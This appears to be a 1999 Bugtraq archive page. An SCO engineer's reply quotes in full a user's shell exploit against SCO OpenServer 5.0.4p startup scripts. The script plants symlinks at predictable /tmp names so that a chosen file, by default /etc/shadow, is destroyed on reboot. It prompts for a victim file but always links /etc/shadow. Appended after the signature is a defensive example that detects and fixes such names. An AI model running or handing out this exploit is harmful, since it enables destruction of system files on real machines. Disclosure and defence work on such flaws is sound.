Leshka,

We have started work on this and are checking all of our OS products to see if they suffer from similar problems. We will make information available at our security pages (http://www.sco.com/security) on how to work around the problem, and will also have fixes available in a few days.

Thanks,

Jon

> -----Original Message-----
> From: Bugtraq List [mailto:BUGTRAQat_private]On Behalf Of leshka
> Sent: 07 March 1999 12:07
> To: BUGTRAQat_private
> Subject: Little exploit for startup scripts (SCO 5.0.4p).
>
>
> #!/bin/sh
> #
> # ... The punishment for disobedience ...
> # (Cycle # 2)
> #
> # This simple script can help to erase any file
> # (SCO OpenServer Enterprise System v 5.0.4p).
> # Have fun !
> #
> # Some of the "/etc/rc2.d" startup scripts create and then delete temporary files
> # with easily predictable names in the "/tmp" directory. Below there are a few
> # interesting fragments of those nice scripts:
> #
> # S84rpcinit:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
> # /bin/rm -f /tmp/rpc.err$$
> # ...
> # rm -rf /tmp/rpc$$
> #
> # S95nis:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
> # /bin/rm -f /tmp/nis.err$$
> # ...
> # rm -f /tmp/nis$$
> #
> # S85tcp:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
> # /bin/rm -f /tmp/ps.err$$
> # ...
> # /bin/rm -f /tmp/tps$$
> #
> # S89nfs:
> # ...
> # /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
> # /bin/rm -f /tmp/nfs.err$$
> # ...
> # rm -f /tmp/nfs$$
> #
> # Every time during the startup such shell scripts create files with names
> # that include the process number of the above shell script. My numerous tests
> # showed that the number is always the same with every reboot. Pretty good,
> # isn't it? One problem: how to determine the process number of such a script?
> # It's so simple! Child processes of this script have PIDs with values
> # slightly above the parent's PID. A little math and one gets it. The next
> # step is creating a few symbolic links to the victim file in the "/tmp"
> # directory. During the next startup the victim file will be destroyed.
> #
> # P.S. Looking forward to SCO publishing a complete list of names
> # of such perfect shell scripts.
> #
> # 999,99*2
> #
> # ----------------------
> # ---------------------------------------------
> # ----------------- Dedicated to my beautiful lady ------------------
> # ---------------------------------------------
> # ----------------------
> #
> # Leshka Zakharoff, 1999. E-mail: leshkaat_private (.ru)
> #
> #
> #
> if [ _$1 = "_" ]
> then
> {
>   echo -n "File to delete [/etc/shadow]:"
>   read victim_file
>   if [ _$victim_file = "_" ]
>   then
>     victim_file="/etc/shadow"
>   fi
> }
> else
>   victim_file=$1
> fi
> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
> lastpid=`expr $pid - 30`
> while [ $pid != $lastpid ]
> do
>   pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
> done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
> ----

Jon Coyle - Manager, Internet Engineering & Secure Technologies
joncoat_private
SCO Ltd.                Tel: +44 1923 813656
Croxley Business Park   Fax: +44 1923 813804
Hatters Lane            http://www.sco.com
Watford, WD1 8YN, UK
Fingerprint: F44A 677A 4920 02AC C655 D419 B9B7 46B0 A951 6FF7
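The guessable `$$`-based /tmp names in the quoted rc fragments, and the mktemp-based replacement an administrator would want, as an added shell example that is not from leshka's post or from SCO; the copied S85tcp fragment, the `$WORK` directory and the function names are assumptions made for this demo.

```sh
#!/bin/sh
# Added example: audit rc scripts for $$-based /tmp names and show the
# fix. The sample fragment, $WORK and all function names are assumptions.
WORK=$(mktemp -d) || exit 1
trap 'rm -rf "$WORK"' EXIT

# Constructed copy of the quoted S85tcp fragment.
cat > "$WORK/S85tcp" <<'EOF'
/bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
/bin/rm -f /tmp/ps.err$$
/bin/rm -f /tmp/tps$$
EOF

# Detection: count lines of a script that write to /tmp under a name
# built from $$ (the guessable name the post relies on).
count_predictable_tmp() {
    grep -cE '/tmp/[A-Za-z0-9._]*\$\$' "$1"
}

# Guard for legacy scripts: refuse to write if the path already exists
# or is a (possibly dangling) symlink. A check-then-write is still racy,
# so this is only a stopgap; the real fix is capture_safely below.
write_refusing_symlinks() {
    if [ -h "$1" ] || [ -e "$1" ]; then
        return 1
    fi
    printf 'snapshot\n' > "$1"
}

# Fix: let mktemp create a fresh, unpredictable file (O_EXCL, mode 600)
# in a private directory, run the command into it, print the number of
# lines captured, and clean up. No pre-planted name is ever followed.
capture_safely() {
    dir=$1; shift
    out=$(mktemp "$dir/snap.XXXXXX") || return 1
    "$@" > "$out"
    wc -l < "$out" | tr -d ' '
    rm -f "$out"
}

# Demo: a planted link of the kind the post describes, aimed at a victim path.
ln -s "$WORK/victim" "$WORK/tps42"
echo "predictable /tmp names in S85tcp: $(count_predictable_tmp "$WORK/S85tcp")"
write_refusing_symlinks "$WORK/tps42" || echo "refused to write through $WORK/tps42"
[ -e "$WORK/victim" ] || echo "victim untouched"
echo "lines captured safely: $(capture_safely "$WORK" printf 'a\nb\n')"
```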
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:14 PDT